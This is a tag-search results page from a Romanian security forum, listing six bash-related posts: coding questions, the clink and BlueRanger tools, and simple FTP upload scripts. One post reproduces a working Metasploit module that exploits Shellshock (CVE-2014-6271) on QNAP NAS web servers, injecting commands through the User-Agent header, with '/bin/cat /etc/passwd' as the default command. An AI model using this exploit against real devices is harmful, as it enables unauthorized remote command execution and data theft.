Jump to content

Search the Community

Showing results for tags 'bash'.


More search options

  • Search By Tags

    Type tags separated by commas.

  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
    • Cryptocurrency
  • Cumparaturi online's Topics
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Cumparaturi online's Test
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.

Joined

Group

AIM

MSN

Website URL

ICQ

Yahoo

Jabber

Skype

Location

Interests

Biography

Location

Interests

Occupation

Found 6 results

  1. Bash shell vs Python/Ruby

    gear posted a topic in Programare

    Salut. Trăgând cu ochiul peste niște proiecte pe github, am văzut fișiere .sh, mă uitam să văd ce anume fac, majoritatea erau pentru automatizare, care făceau request-uri sau alte lucruri de genul, comenzi bash, desigur. Mă gândeam dacă am nevoie de bash scripts, devreme ce știu puțin python, de ce nu aș putea obține aceleași rezultate cu acesta (py), în loc de bash? M-am uitat să văd ce zice google, primele rezultate de la stackoverflow, majoritatea sugerau că depinde de preferințe și alții explicau diferența dintre modul în care sunt executate, poate câteva detalii despre performanță și lucruri low-level care m-au făcut confuz. Voi ce părere aveți? Când folosiți bash în loc de python/ruby și vice versa? Desigur, python/ruby sunt pentru domenii mai largi, eu vreau să îndrept subiectul spre domeniul în care este folosit bash-ul mai mult, I guess sysops stuff. P.S.: Nu sunt atât de informat cu privire la lucruri de genul, mă scuzați dacă întrebările sunt cam nepotrivite.
  2. # Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; #{datastore['CMD']}" }) if res.body.empty? print_error("No data found.") elsif res.code== 302 print_status("#{rhost}:#{rport} - bash env variable injected") puts " " print_line(res.body) end end end Source

  3. Ajutor bash

    unixbreak posted a topic in Programare

    Salut, am niste fisiere csv pe care vreau sa le concatenez intr-unu singur fisier si sa le ordonez numeric. Problema e ca idul dupa care ordonez nu respecta o notatie standard. de ex . sort -f *.csv > output.csv merge daca idul respecta forma id001 id002 id010 id100. Idurile pt fisierele mele sunt id1 id2 id10 id100 si asta imi strica sortarea. sort -t, -V *.csv > output.csv merge perfect face exact ce imi trebuie pe masina de test care are sort --version gnu coreutils 8.5.0 nu 5.3.0 versiunea de la munca. Si bineinteles nu era implementata -V in 5.3.0 ma simt noob ... dar si ghinionist. Daca va plictisiti si aveti o idee mai buna, bring it on ! Multumesc

  4. clink

    OKQL posted a topic in Programe utile

    Bringing Bash's powerful command line editing to Microsoft Windows' cmd.exe Introduction Clink enhances your productivity in Microsoft Windows' "cmd.exe". If you're familiar with Bash then you will be familiar with the changes that clink brings to "cmd.exe" (it uses the same 'Readline' library that Bash uses). It is a small utility to enhance "cmd.exe", adding more powerful command line completion, editing, and history. Features Powerful Bash-like line editing from GNU's Readline library. Read more on Readline's keyboard shortcuts. Superior path completion (TAB). Paste from clipboard (Ctrl-V). Support for the completion of executables/commands, and environment variables. Undo/Redo (Ctrl-_ or Ctrl-X, Ctrl-U) Improved command line history. Persists across sessions. Searchable (Ctrl-R and Ctrl-S). History expansion (e.g. !!, !<string>, and !$). [*] Scriptable completion using Lua. Usage There are a variety of ways to start clink; If you installed the auto-run, start "cmd.exe" as per usual. To manually start, run the clink shortcut from the Start menu (or the clink.bat located in the install directory). To deploy clink to an existing cmd.exe process, use "<install_dir>\clink.exe inject" clink has been tested on Windows XP SP3 and upwards. Visual C++ Redistributable requirement clink requires that the Microsoft's Visual C++ 2010 Redistributable be install on your system. If you need to install them they can be found here; 32-bit (x86); Download Microsoft Visual C++ 2010 Redistributable Package (x86) from Official Microsoft Download Center 64-bit (x64); Download Microsoft Visual C++ 2010 Redistributable Package (x64) from Official Microsoft Download Center Writing completion scripts with Lua It is easy to customise completion in clink with simple Lua scripts. It is a matter of writing a match generator function and registering the function with clink. When called the generator function adds matches to clink - if appropriate. A very basic example script gives the best overview of what is involved; -- Globals; -- rl_line_buffer : The current command line. -- rl_point : Current location of the cursor. function example_match_generator(text, first, last) -- Arguments; -- text : The word being completed, as tokenised by Readline. -- first : The index into rl_line_buffer where 'text' starts. -- last : Index into rl_line_buffer where 'text' ends. -- Returns; -- true : No further generator functions should be called. -- false : Generator has done nothing. Try the next generator. -- In this simple example generate a match when the user types -- the following; my_ma<TAB> if not rl_line_buffer == "my_ma" then return false end clink.add_match("my_match") return true end -- clink.register_match_generator(<function>, <priority>) clink.register_match_generator(example_match_generator, 50) Further examples can be found in clink's install directory. User's Lua scripts go in %ALLUSERSPROFILE%\clink\ (which is usually C:\ProgramData\clink\) and clink loads the .lua files it finds there. The keyboard shortcut Ctrl-Q will force clink to reload the Lua scripts - useful when writing your own scripts. Changing match display colour Create a new Lua script in %ALLUSERSPROFILE%\clink\ Add the following line (where X is a number in the range 0-15); clink.setpalette(X) For values for X run "color /?" on a command prompt. Building clink Download Premake from here; Premake | Industrious One There is a bug in Premake 4.3 that generates corrupt .vcxproj files. Please use 4.4 (or newer). [*] Run "premake <toolchain>" in the root of clink's source tree. Where "<toolchain>" is one of Premake's actions (see "premake --help") clink has been tested with vs2010, gmake (with mingw32), and vs2008. [*] Build scripts will be generated in ".build\<toolchain>\". For example; .build\vs2010\clink.sln. Builds Builds from the git repository can be found here; https://www.dropbox.com/sh/r9oqmn2mqfp3okp/Jm_F3pJSNI Downloads Source: https://code.google.com/p/clink/

  5. BlueRanger

    Versus71 posted a topic in Wireless Pentesting

    BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory). Use a Bluetooth Class 1 adapter for long range location detection. Switch to a Class 3 adapter for more precise short range locating. The precision and accuracy depend on the build quality of the Bluetooth adapter, interference, and response from the remote device. Fluctuations may occur even when neither device is in motion. Installation: This script can run from any directory. Resources: BlueZ hcitool l2ping Usage: Provide the local interface and Device Address of the device you are trying to locate. # blueranger.sh hci0 6C:D6:8A:B1:30:BC Download: http://www.hackfromacave.com/download/blueranger.sh
  6. Connect to FTP HOST and Send File Script 1 #!/bin/sh -vx # # Script to FTP data to server # Paramters: host FTP Server # user FTP Username # passwd FTP Password # file File to send/put ############################## # Variables HOST=$1 USER=$2 PASSWD=$3 FILE=$4 TONAME=$5 # Connect to FTP HOST and Send File ftp -n $HOST <<END_SCRIPT quote USER $USER quote PASS $PASSWD dir ascii put $FILE $TONAME dir quit END_SCRIPT exit 0 Usage: ./ftp1.sh <host> <username> <passwd> <filename> <toname> Script 2 #!/bin/bash clear echo "[+] - - - - - - - - - - - - - - - - - - - - - - - [+]" echo "[+] irc.[***].com [+]" echo "[+] #PUB - Channel [+]" echo "[+] Usage: ./ftp.sh ftp.TV.nL users pass arhive [+]" echo "[+] - - - - - - - - - - - - - - - - - - - - - - - [+]" ftp -inv $1<<ENDFTP user $2 $3 put $4 bye ENDFTP echo "[+] Gata [+]" echo "[+] uter [+]" usage: ./ftp.sh <host> <user> <pass> <arhiva> Download: [+] Script 1 - http://tevad.do.am/ftp1.sh [+] Script 2 - http://tevad.do.am/ftp.sh
×